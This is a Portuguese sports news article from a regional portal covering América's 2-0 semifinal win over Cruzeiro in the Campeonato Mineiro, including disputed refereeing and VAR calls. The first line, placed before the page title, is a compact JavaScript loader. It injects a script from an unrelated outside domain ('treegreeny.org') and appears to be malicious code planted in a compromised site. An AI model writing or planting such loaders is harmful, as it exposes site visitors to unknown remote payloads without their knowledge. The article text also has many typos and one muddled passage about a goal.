;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Jacaré e bota mão em vaga na final do Mineiro.. - Portal Carangola

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Jacaré e bota mão em vaga na final do Mineiro..

Em duelo na Arena do Jacaré, América faz 2 a 0 no Cruzeiro e amplia vantagem em busca da vaga na final; Raposa tem que fazer 3 a 0 no duelo de volta

Por Frederico Teixeira Publicado em 11 de março de 2023 | 18h32 – Atualizado em 11 de março de 2023 | 19h49

Aloísio comemora com os companheiros o primeiro gol do América no duelo contra o Cruzeiro, na Arena do Jacaré — Foto: Flickr América/Divulgação

O América ficou muito mais perto de conquistar uma vaga na grande decisão do Campeonato Mineiro. Em jogo com direito a decisão polêmica da arbitragem, o Coelho venceu o Cruzeiro por 2 a 0 neste sábado (11), na Arena do Jacaré, em Sete Lagoas, no duelo de ida da semifinal do Estadual.

Como fez melhor campanha na primeira fase, pelo regulamento, o América tem a vantagem de jogar por dois empates ou por uma vitória e uma derrota pelo mesmo saldo de gols. Assim, pode perder até por 2 a 0 na partida de volta, no Independência, na semana que vem, que se garante na finalíssima.

Sob ollhar de Ronaldo Fenômengo, gestor da SAF celeste, que estava em um dos camarotes da Arena do Jacaré, o Cruzeiro, que entrou em campo com uma formaçção mais ofensiva, com Ramiro, Nikão e Wesley como maiores novidades, começou bem melhor a partida, tentando pressionar o Coelho em seu campo de ataque.

Aos 2 minutos,  Ramiro sofreu falta na entrada da área. Por pouco não seria pênalti. Gilberto tentou a cobrança, mas a bola ficou na barreira.

O Cruzeiro também tentava chegar bem com o trio formado por Wesley, Bruno Rodrigues e Nikão..Em um dessas triangulações, Gilberto foi lançado na área, mas se atrapalhou na finalização. De toda forma, já estava impedido

O América chegou pela primeira vez com algum perigo no campo ofensivo apenas aos 5 minutos. O Coelho adotava uma postura um pouco mais recuada, deixando armado os seus contra ataques, em especial com a bola passando pelos pés de Benítez.

E a arma do Coelho quase deu certo ao 9 minutos, em finalização de  Matheusinho após limpar o zagueiro Reynaldo. Rafael Cabral fez boa defesa.

Até os 15 minutos, o Cruzeiro conseguiu manter sua pressão, mas falhava no momento das finalizações. O mais lúcido seguia sendo Bruno Rodrigues. Wesley também tentava aparecer bem.

os poucos, o América conseguiu se soltar mais. Principalmente com Benitez criando as jogadas. Aos 23 minutos, ele levou a melhor pela esquerda, cruzou na cabeça de Felipe Azevedo, dentro da área, Rafael Cabral defendeu.

Mas no minuto seguinte, naõ teve erro. Em um vacilo da defesa celeste, Juninho foi lançado em profundidade dentro da área, fez o pivô de cabeça para Aloísio mandar para o fundo do gol. Festa da torcida do América.

O Cruzeiro tentou não sentir o golpe e quase empatou aos 33 minutos. Em jogada pela esquerda, Nikão cruzou para Wesley bater de direita, carimbando o travessão, mas já havia impedimento

O Cruzeiro seguiu insistindo, mas falhava nas finalizações, teve chance com Oliveira, mas Cavichioli fez grande defesa, mostrando coragem.

No fim, foi o América quem  amplicou. Aos 46 minutos, Arthur iniciou bela jogada, mas Reynaldo chega pra salvar no último minuto.

A Raposa ainda chegaria mais duas vezes. Primeiro, após Wesley bater prensado, a bola sobrou para Nikão, que bate cruzado, com perigo. Depois, após bom lançamento de Ramiro, Gilberto infiltrou na defesa e bateu forte, mas a bola subiu muito.

Quadro mantido

Precisando ao menos empatar a partida para seguir vivo na disputa pela vaga à final, O Cruzeiro também voltou com boa disposição no início da segunda etapa.

Logo no primeiro minuto, boa jogada de Ramiro e Bruno Rodrigues, o atacante cruza na área, Wesley chega um pouco atrasado, mas consegue desviar e a bola passa perto do gol.

O América seguia bem melhor postado em campo e até balançou as redes aos 3 minutos, com Aloísio, após belo lançamento de Benítez, mas havia impedimento.

O Cruzeiro chegava mais pela capacidade individual de alguns de seus jogadores, como Bruno Rodrigues, que tentou até finalizações de fora da área. Mas o gol celeste quase veio com uma ‘ajudinha’ rival. Aos 8 minutos, Nicolas se atrapalhou e já ia fazendo um gol contra, mas Cavichioli mostrou reação impressionante para evitar.

Arbitragem polêmica

E o jogo ainda seria marcado por polêmicas da arbitragem comandada pelo árbitro Paulo César Zanovelli.

Aos 13 minutos, Wesley foi lançado em velocidade e ficaria livre, na cara do gol, mas Arthur chegou pra pressionar e o atacante celeste caiu, alegando ter sido puxado. A arbitragem nada marcou, para desespero de Pezzolano.

O treinador uruguaio até tentou alterar o quadro da partida, mandando Igor Formiga a campo na vaga de William e Wallisson no lugar de Wesley. Mas não deu nem tempo. No minuto seguinte, Felipe Azevedo foi lançado em profundidade, ele driblou Formiga e cruzou para Juninho apenas mandar para o fundo do gol.

Com 2 a 0 no placar, o América ficou ainda mais tranquilo em campo. Do outro lado, os jogadores do Cruzeiro eram puro nervosismo. Técnico do Amérifca, Wagner Mancini começou a promover substituições, mandando a campo Everaldo na vaga de Matheusinho, Wellington Paulista no posto de Aloísio e Martínez na vaga de Benítez.

O lance mais polêmico veio aos 27 minutos. Em arrancada de Wallisson, a bola sobrou para Gilberto. Quando o atacante se preparava par aconcluir a gol, foi puxado. Mesmo com muita reclamação, o árbitro deu pênalti.

Entretanto, após quase seis minutos para checagem do VAR, quando Gilberto se preparava para a cobrança, a arbitragem assinalou impedimento de Gilberto na origem do lance. Reclamação geral do banco celeste e de Ronaldo Fenômeno.

Dali em diante, praticamente não houve mais jogo. O América seguiu soberando em campo, poderia até ter ampliado, mas manteve o placar até o apito final.